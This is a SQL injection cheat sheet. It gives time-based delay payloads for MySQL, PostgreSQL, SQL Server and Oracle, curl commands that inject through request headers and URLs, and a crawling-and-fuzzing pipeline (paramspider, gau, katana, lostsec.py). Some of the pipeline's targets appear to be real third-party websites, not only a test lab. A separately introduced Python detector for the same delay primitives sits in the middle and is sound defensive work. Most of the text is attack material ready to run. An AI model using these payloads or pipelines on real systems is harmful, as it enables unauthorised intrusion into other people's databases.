SQL Injection Pentest Toolkit

Recon & Automation Commands

SQL Injection Payloads

-- MySQL
SELECT SLEEP(10);
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);
' OR IF(1=1, SLEEP(10), 0)-- -

-- PostgreSQL
SELECT pg_sleep(10);
' OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < interval '0:0:10') THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='1
' OR 1=1; SELECT pg_sleep(5);--
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);--

-- SQL Server
WAITFOR DELAY '00:00:10';
'; WAITFOR DELAY '00:00:05'; --
IF (1=1) WAITFOR DELAY '0:0:10';
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';--

-- Oracle
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;

Time-Based Testing via Headers

User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"

time curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"
time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"
time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'\"" "https://target.com/vulnerable-endpoint"

time curl "https://target.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'\"XOR(if(now()=sysdate(),sleep(10),0))OR\"*/"
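Defensive counterpart, added here and not part of the toolkit: a small Python checker that flags the time-delay primitives used in the payloads above (MySQL sleep(), PostgreSQL pg_sleep(), SQL Server WAITFOR DELAY, Oracle DBMS_PIPE.RECEIVE_MESSAGE) when they appear in the User-Agent, X-Forwarded-For or Referer headers or in the query string of a request. The sample requests, the function names and the set of watched headers are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Delay primitives from the payload list, one pattern per DBMS family.
# Matched case-insensitively after percent-decoding the input.
DELAY_SIGNATURES = {
    "mysql":      re.compile(r"\bsleep\s*\("),
    "postgresql": re.compile(r"\bpg_sleep\s*\("),
    "mssql":      re.compile(r"\bwaitfor\s+delay\b"),
    "oracle":     re.compile(r"dbms_pipe\.receive_message\s*\("),
}
# Request headers the payload list shows being used as injection carriers.
WATCHED_HEADERS = ("user-agent", "x-forwarded-for", "referer")

def normalize(value: str) -> str:
    """Percent-decode twice (catches double encoding) and fold case."""
    return unquote_plus(unquote_plus(value)).lower()

def scan_value(value: str):
    """Return the DBMS families whose delay primitive appears in value."""
    text = normalize(value)
    return sorted(name for name, rx in DELAY_SIGNATURES.items() if rx.search(text))

def scan_request(headers: dict, query: str):
    """Check watched headers and the query string of one request.
    Returns a list of (location, dbms) tuples; empty when nothing matched."""
    findings = []
    for name, value in headers.items():
        if name.lower() in WATCHED_HEADERS:
            findings += [(name, dbms) for dbms in scan_value(value)]
    findings += [("query", dbms) for dbms in scan_value(query)]
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = [
    ({"User-Agent": "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z"}, "id=1"),
    ({"User-Agent": "Mozilla/5.0"}, "id=1%27%3B+WAITFOR+DELAY+%2700%3A00%3A05%27%3B--"),
    ({"Referer": "https://example.test/"}, "id=34"),
]

if __name__ == "__main__":
    for headers, query in SAMPLES:
        print(scan_request(headers, query) or "clean")
```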

Google Dorks

Loxs: Universal Time-based SQLi Detector

Loxs detects time-based SQLi across all DBMS types.
Loxs on GitHub

python3 loxs.py -u "https://target.com/page.php?id=1"

SQLi Educational Videos

SQLi - Video 1
SQLi - Video 2
SQLi - Video 3
SQLi - Video 4

BEST SQLI METHODOLOGY BY COFFIN

For a single URL:
python3 lostsec.py -u "https://cutm.ac.in/payu/skill/index.php?id=34" -p payloads/xor.txt -t 5

For multiple URLs:
paramspider -d www.speedway.net.au -o urls.txt
cat output/urls.txt | sed 's/FUZZ//g' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5

echo testphp.vulnweb.com | gau --mc 200 | urldedupe >urls.txt
cat urls.txt | grep -E '\.php|\.asp|\.aspx|\.cfml|\.jsp' | grep '=' | sort > output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5

echo testphp.vulnweb.com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -f qurl | urldedupe >output.txt
katana -u http://testphp.vulnweb.com -d 5 | grep '=' | urldedupe | anew output.txt
cat output.txt | sed 's/=.*/=/' >final.txt
python3 lostsec.py -1 final.txt -p payloads/xor.txt -t 5

python3 lostsec.py -u 'https://evil.com/index.php?id=' -p /payloads/xor.txt